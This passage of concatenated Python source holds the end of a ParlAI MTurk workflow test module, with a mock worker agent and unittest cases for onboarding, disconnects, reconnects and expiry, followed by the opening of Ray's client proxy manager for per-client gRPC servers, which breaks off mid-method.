"""Class that pretends to be an MTurk agent interacting through the
webpage by simulating the same commands that are sent from the core.html
file. Exposes methods to use for testing and checking status
"""
def __init__(self, hit_id, assignment_id, worker_id,
task_group_id):
self.conversation_id = None
self.id = None
self.assignment_id = assignment_id
self.hit_id = hit_id
self.worker_id = worker_id
self.some_agent_disconnected = False
self.disconnected = False
self.task_group_id = task_group_id
self.ws = None
self.always_beat = True
self.send_acks = True
self.ready = False
self.wants_to_send = False
self.acked_packet = []
self.incoming_hb = []
self.message_packet = []
def send_packet(self, packet):
def callback(*args):
pass
event_name = data_model.SOCKET_ROUTE_PACKET_STRING
self.ws.send(json.dumps({
'type': event_name,
'content': packet.as_dict(),
}))
def register_to_socket(self, ws):
handler = self.make_packet_handler()
self.ws = ws
self.ws.handlers[self.worker_id + self.assignment_id] = handler
def on_msg(self, packet):
self.message_packet.append(packet)
if packet.data['text'] == data_model.COMMAND_CHANGE_CONVERSATION:
self.ready = False
self.conversation_id = packet.data['conversation_id']
self.id = packet.data['agent_id']
self.send_alive()
def make_packet_handler(self):
"""A packet handler that properly sends heartbeats"""
def on_ack(*args):
self.acked_packet.append(args[0])
def on_hb(*args):
self.incoming_hb.append(args[0])
def handler_mock(pkt):
if pkt['type'] == Packet.TYPE_ACK:
self.ready = True
packet = Packet.from_dict(pkt)
on_ack(packet)
elif pkt['type'] == Packet.TYPE_HEARTBEAT:
packet = Packet.from_dict(pkt)
on_hb(packet)
if self.always_beat:
self.send_heartbeat()
elif pkt['type'] == Packet.TYPE_MESSAGE:
packet = Packet.from_dict(pkt)
if self.send_acks:
self.send_packet(packet.get_ack())
self.on_msg(packet)
elif pkt['type'] == Packet.TYPE_ALIVE:
raise Exception('Invalid alive packet {}'.format(pkt))
else:
raise Exception('Invalid Packet type {} received in {}'.format(
pkt['type'],
pkt
))
return handler_mock
def build_and_send_packet(self, packet_type, data):
msg = {
'id': str(uuid.uuid4()),
'type': packet_type,
'sender_id': self.worker_id,
'assignment_id': self.assignment_id,
'conversation_id': self.conversation_id,
'receiver_id': '[World_' + self.task_group_id + ']',
'data': data
}
event_name = data_model.SOCKET_ROUTE_PACKET_STRING
if (packet_type == Packet.TYPE_ALIVE):
event_name = data_model.SOCKET_AGENT_ALIVE_STRING
self.ws.send(json.dumps({
'type': event_name,
'content': msg,
}))
return msg['id']
def send_message(self, text):
data = {
'text': text,
'id': self.id,
'message_id': str(uuid.uuid4()),
'episode_done': False
}
self.wants_to_send = False
return self.build_and_send_packet(Packet.TYPE_MESSAGE, data)
def send_alive(self):
data = {
'hit_id': self.hit_id,
'assignment_id': self.assignment_id,
'worker_id': self.worker_id,
'conversation_id': self.conversation_id
}
return self.build_and_send_packet(Packet.TYPE_ALIVE, data)
def send_heartbeat(self):
"""Sends a heartbeat to the world"""
hb = {
'id': str(uuid.uuid4()),
'receiver_id': '[World_' + self.task_group_id + ']',
'assignment_id': self.assignment_id,
'sender_id': self.worker_id,
'conversation_id': self.conversation_id,
'type': Packet.TYPE_HEARTBEAT,
'data': None
}
self.ws.send(json.dumps({
'type': data_model.SOCKET_ROUTE_PACKET_STRING,
'content': hb,
}))
def wait_for_alive(self):
last_time = time.time()
while not self.ready:
self.send_alive()
time.sleep(0.5)
assert time.time() - last_time < 10, \
                'Timed out waiting for server to acknowledge {} alive'.format(
self.worker_id
)
class TestMTurkManagerWorkflows(unittest.TestCase):
'''Various test cases to replicate a whole mturk workflow'''
def setUp(self):
# Mock functions that hit external APIs and such
self.server_utils = MTurkManagerFile.server_utils
self.mturk_utils = MTurkManagerFile.mturk_utils
self.server_utils.setup_server = \
mock.MagicMock(return_value='https://127.0.0.1')
self.server_utils.setup_legacy_server = \
mock.MagicMock(return_value='https://127.0.0.1')
self.server_utils.delete_server = mock.MagicMock()
self.mturk_utils.setup_aws_credentials = mock.MagicMock()
self.mturk_utils.calculate_mturk_cost = mock.MagicMock(return_value=1)
self.mturk_utils.check_mturk_balance = \
mock.MagicMock(return_value=True)
self.mturk_utils.create_hit_config = mock.MagicMock()
self.mturk_utils.setup_sns_topic = mock.MagicMock(
return_value=TOPIC_ARN)
self.mturk_utils.delete_sns_topic = mock.MagicMock()
self.mturk_utils.delete_qualification = mock.MagicMock()
self.mturk_utils.find_or_create_qualification = mock.MagicMock(
return_value=QUALIFICATION_ID)
self.mturk_utils.find_qualification = mock.MagicMock(
return_value=QUALIFICATION_ID)
self.mturk_utils.give_worker_qualification = mock.MagicMock()
self.mturk_utils.remove_worker_qualification = mock.MagicMock()
self.mturk_utils.create_hit_type = mock.MagicMock(
return_value=HIT_TYPE_ID)
self.mturk_utils.subscribe_to_hits = mock.MagicMock()
self.mturk_utils.create_hit_with_hit_type = mock.MagicMock(
return_value=(MTURK_PAGE_URL, FAKE_HIT_ID, 'MTURK_HIT_DATA'))
self.mturk_utils.get_mturk_client = mock.MagicMock(
return_value=mock.MagicMock())
self.onboarding_agents = {}
self.worlds_agents = {}
# Set up an MTurk Manager and get it ready for accepting workers
self.fake_socket = MockSocket()
time.sleep(0.1)
argparser = ParlaiParser(False, False)
argparser.add_parlai_data_path()
argparser.add_mturk_args()
self.opt = argparser.parse_args(print_args=False)
self.opt['task'] = 'unittest'
self.opt['assignment_duration_in_seconds'] = 1
self.opt['hit_title'] = 'test_hit_title'
self.opt['hit_description'] = 'test_hit_description'
self.opt['task_description'] = 'test_task_description'
self.opt['hit_keywords'] = 'test_hit_keywords'
self.opt['reward'] = 0.1
self.opt['is_debug'] = True
self.opt['log_level'] = 0
self.opt['num_conversations'] = 1
self.mturk_agent_ids = ['mturk_agent_1', 'mturk_agent_2']
self.mturk_manager = MTurkManager(
opt=self.opt,
mturk_agent_ids=self.mturk_agent_ids,
is_test=True,
)
self.mturk_manager.port = self.fake_socket.port
self.mturk_manager.setup_server()
self.mturk_manager.start_new_run()
self.mturk_manager.ready_to_accept_workers()
self.mturk_manager.set_onboard_function(self.onboard_agent)
self.mturk_manager.create_hits()
def assign_worker_roles(workers):
workers[0].id = 'mturk_agent_1'
workers[1].id = 'mturk_agent_2'
def run_task_wait():
self.mturk_manager.start_task(
lambda w: True, assign_worker_roles, self.run_conversation)
self.task_thread = threading.Thread(target=run_task_wait)
self.task_thread.start()
self.agent_1 = MockAgent(TEST_HIT_ID_1, TEST_ASSIGNMENT_ID_1,
TEST_WORKER_ID_1, TASK_GROUP_ID_1)
self.agent_1_2 = MockAgent(TEST_HIT_ID_1, TEST_ASSIGNMENT_ID_3,
TEST_WORKER_ID_1, TASK_GROUP_ID_1)
self.agent_2 = MockAgent(TEST_HIT_ID_2, TEST_ASSIGNMENT_ID_2,
TEST_WORKER_ID_2, TASK_GROUP_ID_1)
def tearDown(self):
self.agent_1.always_beat = False
self.agent_2.always_beat = False
for key in self.worlds_agents.keys():
self.worlds_agents[key] = True
self.mturk_manager.shutdown()
self.fake_socket.close()
self.task_thread.join()
def onboard_agent(self, worker):
self.onboarding_agents[worker.worker_id] = False
while ((worker.worker_id in self.onboarding_agents) and
(self.onboarding_agents[worker.worker_id] is False)):
time.sleep(0.05)
return
def run_conversation(self, mturk_manager, opt, workers):
for worker in workers:
self.worlds_agents[worker.worker_id] = False
for worker in workers:
while self.worlds_agents[worker.worker_id] is False:
time.sleep(0.05)
for worker in workers:
worker.shutdown(timeout=-1)
def alive_agent(self, agent):
agent.register_to_socket(self.fake_socket)
agent.wait_for_alive()
agent.send_heartbeat()
def test_successful_convo(self):
manager = self.mturk_manager
# Alive first agent
agent_1 = self.agent_1
self.alive_agent(agent_1)
assert_equal_by(
lambda: agent_1.worker_id in self.onboarding_agents, True, 2)
agent_1_object = manager.worker_manager.get_agent_for_assignment(
agent_1.assignment_id)
self.assertFalse(self.onboarding_agents[agent_1.worker_id])
self.assertEqual(
agent_1_object.get_status(), AssignState.STATUS_ONBOARDING)
self.onboarding_agents[agent_1.worker_id] = True
assert_equal_by(
agent_1_object.get_status, AssignState.STATUS_WAITING, 2)
# Alive second agent
agent_2 = self.agent_2
self.alive_agent(agent_2)
assert_equal_by(
lambda: agent_2.worker_id in self.onboarding_agents, True, 2)
agent_2_object = manager.worker_manager.get_agent_for_assignment(
agent_2.assignment_id)
self.assertFalse(self.onboarding_agents[agent_2.worker_id])
self.assertEqual(
agent_2_object.get_status(), AssignState.STATUS_ONBOARDING)
self.onboarding_agents[agent_2.worker_id] = True
assert_equal_by(
agent_2_object.get_status, AssignState.STATUS_WAITING, 2)
# Assert agents move to task
assert_equal_by(
agent_2_object.get_status, AssignState.STATUS_IN_TASK, 2)
assert_equal_by(
lambda: agent_2.worker_id in self.worlds_agents, True, 2)
self.assertIn(agent_1.worker_id, self.worlds_agents)
# Complete agents
self.worlds_agents[agent_1.worker_id] = True
self.worlds_agents[agent_2.worker_id] = True
assert_equal_by(
agent_1_object.get_status, AssignState.STATUS_DONE, 2)
assert_equal_by(
agent_2_object.get_status, AssignState.STATUS_DONE, 2)
# Assert conversation is complete for manager and agents
assert_equal_by(lambda: manager.completed_conversations, 1, 2)
assert_equal_by(lambda: len(
[p for p in agent_1.message_packet
if p.data['text'] == data_model.COMMAND_SHOW_DONE_BUTTON]
), 1, 2)
assert_equal_by(lambda: len(
[p for p in agent_2.message_packet
if p.data['text'] == data_model.COMMAND_SHOW_DONE_BUTTON]
), 1, 2)
# Assert sockets are closed
assert_equal_by(lambda: len(
[x for x in manager.socket_manager.run.values() if not x]
), 2, 2)
def test_disconnect_end(self):
manager = self.mturk_manager
# Alive first agent
agent_1 = self.agent_1
self.alive_agent(agent_1)
assert_equal_by(
lambda: agent_1.worker_id in self.onboarding_agents, True, 2)
agent_1_object = manager.worker_manager.get_agent_for_assignment(
agent_1.assignment_id)
self.assertFalse(self.onboarding_agents[agent_1.worker_id])
self.assertEqual(
agent_1_object.get_status(), AssignState.STATUS_ONBOARDING)
self.onboarding_agents[agent_1.worker_id] = True
assert_equal_by(
agent_1_object.get_status, AssignState.STATUS_WAITING, 2)
# Alive second agent
agent_2 = self.agent_2
self.alive_agent(agent_2)
assert_equal_by(
lambda: agent_2.worker_id in self.onboarding_agents, True, 2)
agent_2_object = manager.worker_manager.get_agent_for_assignment(
agent_2.assignment_id)
self.assertFalse(self.onboarding_agents[agent_2.worker_id])
self.assertEqual(
agent_2_object.get_status(), AssignState.STATUS_ONBOARDING)
self.onboarding_agents[agent_2.worker_id] = True
assert_equal_by(
agent_2_object.get_status, AssignState.STATUS_WAITING, 2)
# Assert agents move to task
assert_equal_by(
agent_2_object.get_status, AssignState.STATUS_IN_TASK, 2)
assert_equal_by(
lambda: agent_2.worker_id in self.worlds_agents, True, 2)
self.assertIn(agent_1.worker_id, self.worlds_agents)
# Disconnect agent
agent_2.always_beat = False
assert_equal_by(agent_1_object.get_status,
AssignState.STATUS_PARTNER_DISCONNECT, 3)
assert_equal_by(agent_2_object.get_status,
AssignState.STATUS_DISCONNECT, 3)
self.worlds_agents[agent_1.worker_id] = True
self.worlds_agents[agent_2.worker_id] = True
agent_2.always_beat = True
agent_2.send_alive()
# Assert workers get the correct command
assert_equal_by(lambda: len(
[p for p in agent_1.message_packet
if p.data['text'] == data_model.COMMAND_INACTIVE_DONE]
), 1, 2)
assert_equal_by(lambda: len(
[p for p in agent_2.message_packet
if p.data['text'] == data_model.COMMAND_INACTIVE_HIT]
), 1, 2)
# assert conversation not marked as complete
self.assertEqual(manager.completed_conversations, 0)
# Assert sockets are closed
assert_equal_by(lambda: len(
[x for x in manager.socket_manager.run.values() if not x]
), 2, 2)
def test_expire_onboarding(self):
manager = self.mturk_manager
# Alive first agent
agent_1 = self.agent_1
self.alive_agent(agent_1)
assert_equal_by(
lambda: agent_1.worker_id in self.onboarding_agents, True, 10)
agent_1_object = manager.worker_manager.get_agent_for_assignment(
agent_1.assignment_id)
self.assertFalse(self.onboarding_agents[agent_1.worker_id])
self.assertEqual(
agent_1_object.get_status(), AssignState.STATUS_ONBOARDING)
manager._expire_onboarding_pool()
assert_equal_by(lambda: len(
[p for p in agent_1.message_packet
if p.data['text'] == data_model.COMMAND_EXPIRE_HIT]
), 1, 10)
self.onboarding_agents[agent_1.worker_id] = True
self.assertEqual(
agent_1_object.get_status(), AssignState.STATUS_EXPIRED)
# Assert sockets are closed
assert_equal_by(lambda: len(
[x for x in manager.socket_manager.run.values() if not x]
), 1, 10)
def test_reconnect_complete(self):
manager = self.mturk_manager
# Alive first agent
agent_1 = self.agent_1
self.alive_agent(agent_1)
assert_equal_by(
lambda: agent_1.worker_id in self.onboarding_agents, True, 2)
agent_1_object = manager.worker_manager.get_agent_for_assignment(
agent_1.assignment_id)
self.assertFalse(self.onboarding_agents[agent_1.worker_id])
self.assertEqual(
agent_1_object.get_status(), AssignState.STATUS_ONBOARDING)
self.onboarding_agents[agent_1.worker_id] = True
assert_equal_by(
agent_1_object.get_status, AssignState.STATUS_WAITING, 2)
# Alive second agent
agent_2 = self.agent_2
self.alive_agent(agent_2)
assert_equal_by(
lambda: agent_2.worker_id in self.onboarding_agents, True, 2)
agent_2_object = manager.worker_manager.get_agent_for_assignment(
agent_2.assignment_id)
self.assertFalse(self.onboarding_agents[agent_2.worker_id])
self.assertEqual(
agent_2_object.get_status(), AssignState.STATUS_ONBOARDING)
self.onboarding_agents[agent_2.worker_id] = True
assert_equal_by(
agent_2_object.get_status, AssignState.STATUS_WAITING, 2)
# Assert agents move to task
assert_equal_by(
agent_2_object.get_status, AssignState.STATUS_IN_TASK, 2)
assert_equal_by(
lambda: agent_2.worker_id in self.worlds_agents, True, 2)
self.assertIn(agent_1.worker_id, self.worlds_agents)
# Simulate reconnect to task
stored_conv_id = agent_2.conversation_id
stored_agent_id = agent_2.id
agent_2.conversation_id = None
agent_2.id = None
agent_2.send_alive()
assert_equal_by(lambda: len(
[p for p in agent_2.message_packet
if p.data['text'] == data_model.COMMAND_RESTORE_STATE]
), 1, 4)
self.assertEqual(agent_2.id, stored_agent_id)
self.assertEqual(agent_2.conversation_id, stored_conv_id)
# Complete agents
self.worlds_agents[agent_1.worker_id] = True
self.worlds_agents[agent_2.worker_id] = True
assert_equal_by(
agent_1_object.get_status, AssignState.STATUS_DONE, 2)
assert_equal_by(
agent_2_object.get_status, AssignState.STATUS_DONE, 2)
# Assert conversation is complete for manager and agents
assert_equal_by(lambda: manager.completed_conversations, 1, 2)
assert_equal_by(lambda: len(
[p for p in agent_1.message_packet
if p.data['text'] == data_model.COMMAND_SHOW_DONE_BUTTON]
), 1, 2)
assert_equal_by(lambda: len(
[p for p in agent_2.message_packet
if p.data['text'] == data_model.COMMAND_SHOW_DONE_BUTTON]
), 1, 2)
# Assert sockets are closed
assert_equal_by(lambda: len(
[x for x in manager.socket_manager.run.values() if not x]
), 2, 2)
def test_attempt_break_unique(self):
manager = self.mturk_manager
unique_worker_qual = 'is_unique_qual'
manager.is_unique = True
manager.opt['unique_qual_name'] = unique_worker_qual
manager.unique_qual_name = unique_worker_qual
# Alive first agent
agent_1 = self.agent_1
self.alive_agent(agent_1)
assert_equal_by(
lambda: agent_1.worker_id in self.onboarding_agents, True, 2)
agent_1_object = manager.worker_manager.get_agent_for_assignment(
agent_1.assignment_id)
self.assertFalse(self.onboarding_agents[agent_1.worker_id])
self.assertEqual(
agent_1_object.get_status(), AssignState.STATUS_ONBOARDING)
self.onboarding_agents[agent_1.worker_id] = True
assert_equal_by(
agent_1_object.get_status, AssignState.STATUS_WAITING, 2)
# Alive second agent
agent_2 = self.agent_2
self.alive_agent(agent_2)
assert_equal_by(
lambda: agent_2.worker_id in self.onboarding_agents, True, 2)
agent_2_object = manager.worker_manager.get_agent_for_assignment(
agent_2.assignment_id)
self.assertFalse(self.onboarding_agents[agent_2.worker_id])
self.assertEqual(
agent_2_object.get_status(), AssignState.STATUS_ONBOARDING)
self.onboarding_agents[agent_2.worker_id] = True
assert_equal_by(
agent_2_object.get_status, AssignState.STATUS_WAITING, 2)
# Assert agents move to task
assert_equal_by(
agent_2_object.get_status, AssignState.STATUS_IN_TASK, 2)
assert_equal_by(
lambda: agent_2.worker_id in self.worlds_agents, True, 2)
self.assertIn(agent_1.worker_id, self.worlds_agents)
# Complete agents
self.worlds_agents[agent_1.worker_id] = True
self.worlds_agents[agent_2.worker_id] = True
assert_equal_by(
agent_1_object.get_status, AssignState.STATUS_DONE, 2)
assert_equal_by(
agent_2_object.get_status, AssignState.STATUS_DONE, 2)
# Assert conversation is complete for manager and agents
assert_equal_by(lambda: manager.completed_conversations, 1, 2)
assert_equal_by(lambda: len(
[p for p in agent_1.message_packet
if p.data['text'] == data_model.COMMAND_SHOW_DONE_BUTTON]
), 1, 2)
assert_equal_by(lambda: len(
[p for p in agent_2.message_packet
if p.data['text'] == data_model.COMMAND_SHOW_DONE_BUTTON]
), 1, 2)
# Assert sockets are closed
assert_equal_by(lambda: len(
[x for x in manager.socket_manager.run.values() if not x]
), 2, 2)
# ensure qualification was 'granted'
self.mturk_utils.find_qualification.assert_called_with(
unique_worker_qual, manager.is_sandbox)
self.mturk_utils.give_worker_qualification.assert_any_call(
agent_1.worker_id, QUALIFICATION_ID, None, manager.is_sandbox)
self.mturk_utils.give_worker_qualification.assert_any_call(
agent_2.worker_id, QUALIFICATION_ID, None, manager.is_sandbox)
# Try to alive with the first agent a second time
agent_1_2 = self.agent_1_2
self.alive_agent(agent_1_2)
assert_equal_by(
lambda: agent_1_2.worker_id in self.onboarding_agents, True, 2)
agent_1_2_object = manager.worker_manager.get_agent_for_assignment(
agent_1_2.assignment_id)
# No worker should be created for a unique task
self.assertIsNone(agent_1_2_object)
assert_equal_by(lambda: len(
[p for p in agent_1_2.message_packet
if p.data['text'] == data_model.COMMAND_EXPIRE_HIT]
), 1, 2)
# Assert sockets are closed
assert_equal_by(lambda: len(
[x for x in manager.socket_manager.run.values() if not x]
), 3, 2)
def test_break_multi_convo(self):
manager = self.mturk_manager
manager.opt['allowed_conversations'] = 1
# Alive first agent
agent_1 = self.agent_1
self.alive_agent(agent_1)
assert_equal_by(
lambda: agent_1.worker_id in self.onboarding_agents, True, 2)
agent_1_object = manager.worker_manager.get_agent_for_assignment(
agent_1.assignment_id)
self.assertFalse(self.onboarding_agents[agent_1.worker_id])
self.assertEqual(
agent_1_object.get_status(), AssignState.STATUS_ONBOARDING)
self.onboarding_agents[agent_1.worker_id] = True
assert_equal_by(
agent_1_object.get_status, AssignState.STATUS_WAITING, 2)
# Alive second agent
agent_2 = self.agent_2
self.alive_agent(agent_2)
assert_equal_by(
lambda: agent_2.worker_id in self.onboarding_agents, True, 2)
agent_2_object = manager.worker_manager.get_agent_for_assignment(
agent_2.assignment_id)
self.assertFalse(self.onboarding_agents[agent_2.worker_id])
self.assertEqual(
agent_2_object.get_status(), AssignState.STATUS_ONBOARDING)
self.onboarding_agents[agent_2.worker_id] = True
assert_equal_by(
agent_2_object.get_status, AssignState.STATUS_WAITING, 2)
# Assert agents move to task
assert_equal_by(
agent_2_object.get_status, AssignState.STATUS_IN_TASK, 2)
assert_equal_by(
lambda: agent_2.worker_id in self.worlds_agents, True, 2)
self.assertIn(agent_1.worker_id, self.worlds_agents)
# Attempt to start a new conversation with duplicate worker 1
agent_1_2 = self.agent_1_2
self.alive_agent(agent_1_2)
assert_equal_by(
lambda: agent_1_2.worker_id in self.onboarding_agents, True, 2)
agent_1_2_object = manager.worker_manager.get_agent_for_assignment(
agent_1_2.assignment_id)
# No worker should be created for a unique task
self.assertIsNone(agent_1_2_object)
assert_equal_by(lambda: len(
[p for p in agent_1_2.message_packet
if p.data['text'] == data_model.COMMAND_EXPIRE_HIT]
), 1, 2)
# Assert sockets are closed
assert_equal_by(lambda: len(
[x for x in manager.socket_manager.run.values() if not x]
), 1, 2)
# Complete agents
self.worlds_agents[agent_1.worker_id] = True
self.worlds_agents[agent_2.worker_id] = True
assert_equal_by(
agent_1_object.get_status, AssignState.STATUS_DONE, 2)
assert_equal_by(
agent_2_object.get_status, AssignState.STATUS_DONE, 2)
# Assert conversation is complete for manager and agents
assert_equal_by(lambda: len(
[p for p in agent_1.message_packet
if p.data['text'] == data_model.COMMAND_SHOW_DONE_BUTTON]
), 1, 2)
assert_equal_by(lambda: len(
[p for p in agent_2.message_packet
if p.data['text'] == data_model.COMMAND_SHOW_DONE_BUTTON]
), 1, 2)
assert_equal_by(lambda: manager.completed_conversations, 1, 2)
# Assert sockets are closed
assert_equal_by(lambda: len(
[x for x in manager.socket_manager.run.values() if not x]
), 3, 2)
def test_no_onboard_expire_waiting(self):
manager = self.mturk_manager
manager.set_onboard_function(None)
# Alive first agent
agent_1 = self.agent_1
self.alive_agent(agent_1)
agent_1_object = manager.worker_manager.get_agent_for_assignment(
agent_1.assignment_id)
assert_equal_by(
agent_1_object.get_status, AssignState.STATUS_WAITING, 2)
manager._expire_agent_pool()
assert_equal_by(lambda: len(
[p for p in agent_1.message_packet
if p.data['text'] == data_model.COMMAND_EXPIRE_HIT]
), 1, 2)
# Assert sockets are closed
assert_equal_by(lambda: len(
[x for x in manager.socket_manager.run.values() if not x]
), 1, 2)
def test_return_to_waiting_on_world_start(self):
manager = self.mturk_manager
# Alive first agent
agent_1 = self.agent_1
self.alive_agent(agent_1)
assert_equal_by(
lambda: agent_1.worker_id in self.onboarding_agents, True, 2)
agent_1_object = manager.worker_manager.get_agent_for_assignment(
agent_1.assignment_id)
self.assertFalse(self.onboarding_agents[agent_1.worker_id])
self.assertEqual(
agent_1_object.get_status(), AssignState.STATUS_ONBOARDING)
self.onboarding_agents[agent_1.worker_id] = True
assert_equal_by(
agent_1_object.get_status, AssignState.STATUS_WAITING, 2)
# Make agent_1 no longer respond to change_conversation_requests
def replace_on_msg(packet):
agent_1.message_packet.append(packet)
agent_1.on_msg = replace_on_msg
# Alive second agent
agent_2 = self.agent_2
self.alive_agent(agent_2)
assert_equal_by(
lambda: agent_2.worker_id in self.onboarding_agents, True, 2)
agent_2_object = manager.worker_manager.get_agent_for_assignment(
agent_2.assignment_id)
self.assertFalse(self.onboarding_agents[agent_2.worker_id])
self.assertEqual(
agent_2_object.get_status(), AssignState.STATUS_ONBOARDING)
self.onboarding_agents[agent_2.worker_id] = True
assert_equal_by(
agent_2_object.get_status, AssignState.STATUS_WAITING, 2)
# Assert agents attempt to move to task, but then move back to waiting
assert_equal_by(
agent_2_object.get_status, AssignState.STATUS_IN_TASK, 2)
assert_equal_by(
agent_2_object.get_status, AssignState.STATUS_WAITING, 3)
agent_1.always_beat = False
# Assert no world ever started
self.assertNotIn(agent_2.worker_id, self.worlds_agents)
# Expire everything
manager.shutdown()
# Assert sockets are closed
assert_equal_by(lambda: len(
[x for x in manager.socket_manager.run.values() if not x]
), 2, 2)
if __name__ == '__main__':
unittest.main(buffer=True)
|
proxier.py
|
import atexit
from concurrent import futures
from dataclasses import dataclass
import grpc
import logging
from itertools import chain
import json
import psutil
import socket
import sys
from threading import Lock, Thread, RLock
import time
import traceback
from typing import Any, Callable, Dict, List, Optional, Tuple
import ray
from ray.cloudpickle.compat import pickle
from ray.job_config import JobConfig
import ray.core.generated.ray_client_pb2 as ray_client_pb2
import ray.core.generated.ray_client_pb2_grpc as ray_client_pb2_grpc
from ray.util.client.common import (ClientServerHandle,
CLIENT_SERVER_MAX_THREADS, GRPC_OPTIONS)
from ray._private.services import ProcessInfo, start_ray_client_server
from ray._private.utils import detect_fate_sharing_support
logger = logging.getLogger(__name__)
CHECK_PROCESS_INTERVAL_S = 30
MIN_SPECIFIC_SERVER_PORT = 23000
MAX_SPECIFIC_SERVER_PORT = 24000
CHECK_CHANNEL_TIMEOUT_S = 10
LOGSTREAM_RETRIES = 5
LOGSTREAM_RETRY_INTERVAL_SEC = 2
def _get_client_id_from_context(context: Any) -> str:
"""
Get `client_id` from gRPC metadata. If the `client_id` is not present,
this function logs an error and sets the status_code.
"""
metadata = {k: v for k, v in context.invocation_metadata()}
client_id = metadata.get("client_id") or ""
if client_id == "":
logger.error("Client connecting with no client_id")
context.set_code(grpc.StatusCode.INVALID_ARGUMENT)
return client_id
@dataclass
class SpecificServer:
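    """Handle for one per-client Ray client server: its port, a future that
    resolves to the spawned process, and the gRPC channel used to reach it."""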
port: int
process_handle_future: futures.Future
channel: "grpc._channel.Channel"
def wait_ready(self, timeout: Optional[float] = None) -> None:
"""
Wait for the server to actually start up.
"""
res = self.process_handle_future.result(timeout=timeout)
if res is None:
# This is only set to none when server creation specifically fails.
raise RuntimeError("Server startup failed.")
def poll(self) -> Optional[int]:
"""Check if the process has exited."""
try:
proc = self.process_handle_future.result(timeout=0.1)
if proc is not None:
return proc.process.poll()
except futures.TimeoutError:
return
def kill(self) -> None:
"""Try to send a KILL signal to the process."""
try:
proc = self.process_handle_future.result(timeout=0.1)
if proc is not None:
proc.process.kill()
except futures.TimeoutError:
# Server has not been started yet.
pass
def set_result(self, proc: Optional[ProcessInfo]) -> None:
"""Set the result of the internal future if it is currently unset."""
if not self.process_handle_future.done():
self.process_handle_future.set_result(proc)
def _match_running_client_server(command: List[str]) -> bool:
"""
Detects if the main process in the given command is the RayClient Server.
    This works by ensuring that the first three arguments are similar to:
<python> -m ray.util.client.server
"""
flattened = " ".join(command)
rejoined = flattened.split()
if len(rejoined) < 3:
return False
return rejoined[1:3] == ["-m", "ray.util.client.server"]
class ProxyManager():
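    """Tracks one SpecificServer per client, allocates their ports from a fixed
    range, and periodically reaps servers whose processes have exited."""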
def __init__(self,
redis_address: Optional[str],
session_dir: Optional[str] = None):
self.servers: Dict[str, SpecificServer] = dict()
self.server_lock = RLock()
self.redis_address = redis_address
self._free_ports: List[int] = list(
range(MIN_SPECIFIC_SERVER_PORT, MAX_SPECIFIC_SERVER_PORT))
self._check_thread = Thread(target=self._check_processes, daemon=True)
self._check_thread.start()
self.fate_share = bool(detect_fate_sharing_support())
self._session_dir: str = session_dir or ""
atexit.register(self._cleanup)
def _get_unused_port(self) -> int:
"""
Search for a port in _free_ports that is unused.
"""
with self.server_lock:
num_ports = len(self._free_ports)
for _ in range(num_ports):
port = self._free_ports.pop(0)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.bind(("", port))
except OSError:
self._free_ports.append(port)
continue
finally:
s.close()
return port
raise RuntimeError("Unable to succeed in selecting a random port.")
def _get_redis_address(self) -> str:
"""
Returns the provided Ray Redis address, or creates a new cluster.
"""
if self.redis_address:
return self.redis_address
# Start a new, locally scoped cluster.
connection_tuple = ray.init()
self.redis_address = connection_tuple["redis_address"]
self._session_dir = connection_tuple["session_dir"]
return self.redis_address
def _get_session_dir(self) -> str:
"""
Gets the session_dir of this running Ray session. This usually
looks like /tmp/ray/session_<timestamp>.
"""
if self._session_dir:
return self._session_dir
# Connect a driver to an already running cluster.
connection_tuple = ray.init(address=self._get_redis_address())
ray.shutdown()
self._session_dir = connection_tuple["session_dir"]
return self._session_dir
def create_specific_server(self, client_id: str) -> SpecificServer:
"""
Create, but not start a SpecificServer for a given client. This
method must be called once per client.
"""
with self.server_lock:
assert self.servers.get(client_id) is None, (
f"Server already created for Client: {client_id}")
port = self._get_unused_port()
server = SpecificServer(
port=port,
process_handle_future=futures.Future(),
channel=grpc.insecure_channel(
f"localhost:{port}", options=GRPC_OPTIONS))
self.servers[client_id] = server
return server
def start_specific_server(self, client_id: str,
job_config: JobConfig) -> bool:
"""
Start up a RayClient Server for an incoming client to
communicate with. Returns whether creation was successful.
"""
specific_server = self._get_server_for_client(client_id)
assert specific_server, f"Server has not been created for: {client_id}"
serialized_runtime_env = job_config.get_serialized_runtime_env()
proc = start_ray_client_server(
self._get_redis_address(),
specific_server.port,
fate_share=self.fate_share,
server_type="specific-server",
serialized_runtime_env=serialized_runtime_env,
session_dir=self._get_session_dir())
        # Wait for the process being run to transition from the shim process
# to the actual RayClient Server.
pid = proc.process.pid
if sys.platform != "win32":
psutil_proc = psutil.Process(pid)
else:
psutil_proc = None
# Don't use `psutil` on Win32
while psutil_proc is not None:
if proc.process.poll() is not None:
logger.error(
f"SpecificServer startup failed for client: {client_id}")
break
cmd = psutil_proc.cmdline()
if _match_running_client_server(cmd):
break
logger.debug(
"Waiting for Process to reach the actual client server.")
time.sleep(0.5)
specific_server.set_result(proc)
logger.info(f"SpecificServer started on port: {specific_server.port} "
f"with PID: {pid} for client: {client_id}")
return proc.process.poll() is None
def _get_server_for_client(self,
client_id: str) -> Optional[SpecificServer]:
with self.server_lock:
client = self.servers.get(client_id)
if client is None:
logger.error(f"Unable to find channel for client: {client_id}")
return client
def get_channel(
self,
client_id: str,
) -> Optional["grpc._channel.Channel"]:
"""
Find the gRPC Channel for the given client_id. This will block until
the server process has started.
"""
server = self._get_server_for_client(client_id)
if server is None:
return None
# Wait for the SpecificServer to become ready.
server.wait_ready()
try:
grpc.channel_ready_future(
server.channel).result(timeout=CHECK_CHANNEL_TIMEOUT_S)
return server.channel
except grpc.FutureTimeoutError:
logger.exception(f"Timeout waiting for channel for {client_id}")
return None
def _check_processes(self):
"""
Keeps the internal servers dictionary up-to-date with running servers.
"""
while True:
with self.server_lock:
for client_id, specific_server in list(self.servers.items()):
if specific_server.poll() is not None:
del self.servers[client_id]
# Port is available to use again.
self._free_ports.append(specific_server.port)
time.sleep(CHECK_PROCESS_INTERVAL_S)
def _cleanup(self) -> None:
"""
Forcibly kill all spawned RayClient Servers. This ensures cleanup
for platforms where fate sharing is not supported.
"""
for server in self.servers.values():
server.kill()
class RayletServicerProxy(ray_client_pb2_grpc.RayletDriverServicer):
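    """Forwards RayletDriver RPCs to the per-client server identified by the
    `client_id` in the request metadata."""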
def __init__(self, ray_connect_handler: Callable,
proxy_manager: ProxyManager):
self.proxy_manager = proxy_manager
self.ray_connect_handler = ray_connect_handler
def _call_inner_function(
self, request, context,
method: str) -> Optional[ray_client_pb2_grpc.RayletDriverStub]:
